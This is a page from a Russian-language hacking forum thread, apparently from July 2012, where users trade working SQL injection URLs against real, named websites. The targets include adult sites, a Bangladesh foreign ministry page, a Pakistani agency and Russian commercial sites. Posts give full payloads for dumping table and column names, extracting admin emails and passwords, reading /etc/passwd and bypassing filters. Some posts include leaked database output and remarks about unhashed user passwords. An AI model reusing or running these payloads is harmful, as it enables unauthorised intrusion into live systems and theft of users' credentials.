HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1516 из 1604 « Первая < 5161016141614661506 1512 1513 1514 1515 1516 1517 1518 1519 1520 15261566 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15151  
Старый 15.07.2012, 18:28
Unknown
Guest
Сообщений: n/a
Провел на форуме:
9763

Репутация: 8
По умолчанию
MSSQL POST SQLi в параметре 'inputString'

URL:http://www.cotizalia.com/include/redicabecera.asp

Яндекс тИЦ: 10

Google Page Rank: 5/10

Цитата:
Сообщение от None  
inputString=1' UNION ALL SELECT NULL, NULL, NULL, CHAR(58)+CHAR(99)+CHAR(104)+CHAR(122)+CHAR(58)+CHA R(66)+CHAR(105)+CHAR(85)+CHAR(108)+CHAR(87)+CHAR(8 5)+CHAR(73)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(58) +CHAR(97)+CHAR(112)+CHAR(114)+CHAR(58)--
 
Ответить с цитированием

  #15152  
Старый 16.07.2012, 22:04
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Сайт по созданию сайтов
Студия Алексея Романова

Таблицы

Цитата:
Сообщение от None  
http://site-your.ru/section.php?id=-7+Union+selecT+1,table_name,3,table_name,5,6,7,8,9 +from+information_schema.tables+limit+91,1--+
Колонки

Цитата:
Сообщение от None  
http://site-your.ru/section.php?id=-7+Union+selecT+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=%27b_blo g_user2blog%27+limit+0,1--+
 
Ответить с цитированием

  #15153  
Старый 19.07.2012, 03:57
automatic
Guest
Сообщений: n/a
Провел на форуме:
202

Репутация: 0
По умолчанию
Секси

http://www.babestare.com/index.php?type=2+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6--

5.1.63-cll:aiwebtoo_cremz@localhost:aiwebtoo_cremzinc
 
Ответить с цитированием

  #15154  
Старый 19.07.2012, 13:25
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
PR=4

По запросу "sex movies" - 3 место в выдаче.

База ~43к юзеров, не хешированные пассы, приличный траф.

Цитата:
Сообщение от None  
http://www.twilightsex[dot]com/action.php?action=download_movie&id=-304715'+AND+extractvalue(1,concat(0x3a,(SELECT+pas sword+from+users+limit+0,1)))+--+
 
Ответить с цитированием

  #15155  
Старый 19.07.2012, 19:15
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию
погимморился с фильтрами, но обошел

Цитата:
Сообщение от None  
http://meetmrkt.com/index.php?page=gallery&id=33+/*!and+1*/=2+union%23%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,user%28%2 9,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63+from+dt_members+--+
 
Ответить с цитированием

  #15156  
Старый 19.07.2012, 22:19
Unknown
Guest
Сообщений: n/a
Провел на форуме:
9763

Репутация: 8
По умолчанию
MySQL: GET SQLi, параметр 'mode' в URL:http://www.sunporno.com/login.php

Яндекс тИЦ (CY): 10

Google PageRank (PR): 4/10

Цитата:
Сообщение от None  
http://www.sunporno.com/login.php?mode=-6337%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C %20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6d76 793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%2 9%2C0x20%29%2C0x3a73716d3a%29%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%23
VERSION()

Цитата:
Сообщение от None  
5.5.23-log
USER()

Цитата:
Сообщение от None  
sunporno_db@192.168.1.3
DATABASE()

Цитата:
Сообщение от None  
sunporno_db
Еще одна порнушка (тот же вектор)

MySQL: GET SQLi, параметр 'mode' в URL:http://www.ah-me.com/channels.php

Яндекс тИЦ (CY): 0

Google PageRank (PR): 3/10

Цитата:
Сообщение от None  
http://www.ah-me.com/channels.php?mode=-6337%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C %20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6d76 793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%2 9%2C0x20%29%2C0x3a73716d3a%29%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%23
MySQL: Error-based Duplicate entry GET SQLi в URL:http://piluli.ru/

Яндекс тИЦ (CY): 600

Google PageRank (PR): 4/10

сложная кэш скуля, вместо [random_string] любые символы, с каждым запросом новые

Цитата:
Сообщение от None  
http://piluli.ru/?[random_string]'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/concat(admin_email_address,';',admin_password)/**/from/**/admin/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
MySQL: GET SQLi параметр 'letter' в URL:http://www.classes.ru/all-spanish/

Яндекс тИЦ (CY): 475

Google PageRank (PR): 2/10

Цитата:
Сообщение от None  
http://www.classes.ru/all-spanish/?letter=1%27%20LIMIT%201%2C1%20UNION%20ALL%20SELEC T%20NULL%2C%20CONCAT%280x3a7078683a%2CIFNULL%28CAS T%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a7 16f6d3a%29%23
 
Ответить с цитированием

  #15157  
Старый 22.07.2012, 20:51
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию
PR: 6

Код:
Code:
http://www.mofa.gov.bd/lbr/ViewLBR.php?txtUserId=-Canberra%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
 
Ответить с цитированием

  #15158  
Старый 23.07.2012, 19:59
^NSA^
Guest
Сообщений: n/a
Провел на форуме:
19040

Репутация: 32
По умолчанию
Паки

Цитата:
Сообщение от None  
http://www.smeda.org.pk/main.php?id=-2 union select 1,(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7--
 
Ответить с цитированием

  #15159  
Старый 24.07.2012, 01:57
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
PR == 4;

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//wap.indosat.com/produk_detail.php?i=-1+union+select+1,file_priv,3,4,5,6,7,8,9,10,11+from+mysql.user--[/COLOR][/COLOR] 
ТИЦ == 10, PR == 1;

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.debilz.com/index.phtml?id=-352+union+select+concat_ws(0x03a,id,Login,Password),2,3+from+accounts--[/COLOR][/COLOR] 
PR == 2;

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//sante.ismat.ch/article.php?id=-50+union+select+0,1,load_file('/etc/passwd'),3,4,5,6--[/COLOR][/COLOR] 
http://sante.ismat.ch/phpinfo.php в помощь.
 
Ответить с цитированием

  #15160  
Старый 24.07.2012, 07:49
^NSA^
Guest
Сообщений: n/a
Провел на форуме:
19040

Репутация: 32
По умолчанию
iamsynergy

Цитата:
Сообщение от None  
http://www.iamsynergy.com/trainers.php?id=-12 union select 1,2,(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8, 9,0,1,12 --
 
Ответить с цитированием
Ответ
Страница 1516 из 1604 « Первая < 5161016141614661506 1512 1513 1514 1515 1516 1517 1518 1519 1520 15261566 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ